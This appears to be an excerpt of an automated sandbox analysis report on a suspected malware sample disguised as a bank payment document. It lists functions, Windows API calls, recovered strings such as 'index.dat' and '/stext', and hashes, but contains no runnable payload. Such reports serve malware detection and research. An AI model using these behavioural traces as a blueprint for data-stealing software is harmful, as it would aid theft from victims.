                                                                                                                                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 839530781-0
                                                                                                                                                                                                                                          • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                                          Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                                          • String ID: *.*$index.dat
                                                                                                                                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                          • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                                          Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                                          Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3397143404-0
                                                                                                                                                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                                          Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1125800050-0
                                                                                                                                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                                          Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandleSleep
                                                                                                                                                                                                                                          • String ID: }A
                                                                                                                                                                                                                                          • API String ID: 252777609-2138825249
                                                                                                                                                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                                          Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3056473165-0
                                                                                                                                                                                                                                          • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                                          Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                          Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID: BINARY
                                                                                                                                                                                                                                          • API String ID: 2221118986-907554435
                                                                                                                                                                                                                                          • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                                          Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                                                                          • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                                          • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                                          Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2445788494-0
                                                                                                                                                                                                                                          • Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                                          Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                          • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                          • Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                                                                                          • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                                                                                                                                          Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcmpmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1065087418-0
                                                                                                                                                                                                                                          • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                                          Function 00406C5A Relevance: 2.7, APIs: 2, Instructions: 184COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,?,?,00000000,?,?,00000001,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00406E5A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$??2@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3700833809-0
                                                                                                                                                                                                                                          • Opcode ID: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                                                                                                                                          • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                                                                          Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1381354015-0
                                                                                                                                                                                                                                          • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
